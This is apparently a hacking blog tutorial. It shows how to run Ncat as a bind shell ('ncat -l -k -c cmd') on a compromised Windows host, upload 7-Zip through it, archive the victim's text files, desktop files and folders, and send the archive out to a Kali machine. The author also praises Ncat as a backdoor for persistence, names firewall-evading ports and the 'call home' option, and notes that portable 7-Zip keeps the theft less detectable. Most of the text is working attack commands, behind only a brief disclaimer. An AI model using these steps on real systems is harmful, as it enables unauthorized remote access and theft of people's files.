How to use Ncat and 7-Zip Command Line Version to Easily Transfer Multiple Files and Folders from a Remote Windows Host.

Ncat is an updated version of Netcat often referred to as a “network swiss army knife” providing multiple useful functions on remote networks, one of which is file transfer from host to host. The file transfer feature in Ncat while useful is not overly robust when it comes to transferring multiple files, specifically from a remote Windows host. Thankfully we can combine Ncat with one of my other favorite utilities, 7-Zip Command Line version.

The Plan:

Copy 7-Zip to a remote Windows host via Ncat from your Linux host. Use the 7-Zip command line to zip multiple files and folders into a single zip file on the remote host. Transfer the zip file back to your Linux host. Unzip your bounty. Smile at a job well done.

The Requirements:

Linux with Ncat – I used Kali for this demo
Ncat-Portable Beta
7-Zip Command Line Version for Windows
A Windows remote host – I used Win 7 for this demo

The Disclaimer:

This tutorial requires a remote host with Ncat running in listener mode and shoveling shell back to you. How you get Ncat on the remote host and up and running with the commands I provide below is up to you. As always remember to only break into machines that you own or that someone is allowing you to pwn. I am not suggesting that you should use this file transfer method for nefarious purposes but Ncat makes a great back door for maintaining access. Remote access to Ncat can be assigned to any of the popular firewall ignored ports like 80 or 443. In addition you can use certain switches within Ncat to call home to an external public IP address thus bypassing the typical corporate firewall policy of considering all inside-out traffic as safe. These features of Ncat are outside the scope of this article, though may be discussed in a future tutorial. Lastly, 7-Zip Command Line Version does not require an actual install on the remote Windows host and can be executed *surprise* via the command line making the process of zipping up files on the remote host for transfer even less detectable.

The Steps:

1. As I mentioned above you will need to drop the ncat.exe file you downloaded into a folder, of your choice, on the remote Windows host. I dropped my Ncat file into the root directory of the user I wanted to copy files from for sheer usability. Once you have the file copied run the ncat -l -k -c cmd command in the command prompt of the remote Windows host. The -l switch sets the machine as a listener, the -k command forces the Windows host to keep the connection open even if your Linux host closes the session, the -c cmd command shovels shell back to any connecting host. You could add the -p port-number to specify a common port number in an attempt to evade a firewall’s security if you are connecting remotely to a host on the DMZ, but in my case the remote Windows host is on the local network. From here on out all access to the remote Windows machine will be via Ncat on your local Linux host.

NCatAnd7za00

2. On your Linux machine run the command ncat remote-host-ip. I will be targeting a host at 192.168.56.101 and will refer to this IP address in the place for remote-host-ip from now on. Note: if you opted to use an alternate port on the remote Windows machine the command you would enter will look like this ncat 192.168.56.101 80 with the port, in this case 80, listed last.NCatAnd7za01

3. Once the command is executed and a connection established you will be presented with a very familiar looking command prompt within your own Linux terminal.NCatAnd7za02

4. Now we will need to copy 7-zip over to the target Windows host. To do so we will be opening another Ncat session on the remote Windows host by entering the ncat -l -p 8080 > 7za.exe command into your newly acquired shell access on your Linux machine. This will prepare the remote Windows host machine to receive the 7-Zip command line tool. Make sure to specify a different port then the original session to avoid any confusion on Ncat’s part as to what session to transfer the file via.NCatAnd7za03

5. Open an additional terminal session on your Linux host to connect to the newly created listener on the Windows host by entering the ncat –send-only 192.168.56.101 8080 < 7za.exe command. After the file transfer is complete this session to the remote Windows host immediately terminated but the original remains.NCatAnd7za04

6. Now we will use the 7-Zip command line to zip up target files and folders on the remote Windows host that we want to transfer back to our Linux host. I will be issuing these commands on my Linux host in the original Terminal window I used to gain shell access to the remote Windows host. I will start by zipping up all of the txt files I found in the user’s root directory by issuing the 7za a -tzip backup.zip *.txt command. 7za invokes the 7-Zip executable a adds or achieves files to the target zip file, -tzip specifies a .zip file, backup.zip creates or specifies the target .zip file and lastly *.txt tells 7-Zip zip all of the .txt files in the current directory.

NCatAnd7za06

7. Next I want to copy some files off of the HAT users desktop so I cd to the Desktop folder and issue a dir command to list all of the files contained within.

 

NCatAnd7za07

8. You can invoke the 7za command from any folder as long as you specify the original location of the 7za executable. Additionally you can tell 7-Zip to add files to your original zip by providing the exact path to the existing zip.  Note that I can also specify a specific file by including the file name and extension at the end of the 7za command string.NCatAnd7za08

9. The last item I want to grab is the folder called folder01 and all of its contents. Specifying a folder works in the exact way you specify a file by simply entering its exact name at the end of the command string, minus the extension of course.NCatAnd7za09

10. To transfer the zip file you just created back to the Linux host machine we will remotely setup another Ncat listener on the remote Windows host via the shell access we gained earlier on our Linux host. This time we will be sending a file not receiving. The command used is ncat -l -p 8080 –send-only < backup.zip. Note that I was able to use port 8080 again as the previous Ncat session had been terminated allowing me to use 8080.NCatAnd7za10

11. On the Linux host we will need to open another terminal to receive the zip file on port 8080 by issuing the ncat 192.168.56.101 8080 > backup.zip command.NCatAnd7za11

12. Once the transfer is complete you can use the ls command to verify that the zip file transferred correctly.NCatAnd7za12

13. To claim your bounty simply issue the unzip back.zip command into terminal.NCatAnd7za13

14. Using the ls command again we can now see our extracted files.NCatAnd7za14

I hope you find this tutorial useful in your future networking adventures! To receive updates each time we release a new article, feel free to follow us on Twitter via @HackAndTinker.

-Philip Straatsma

Leave a Comment

Your email address will not be published. Required fields are marked *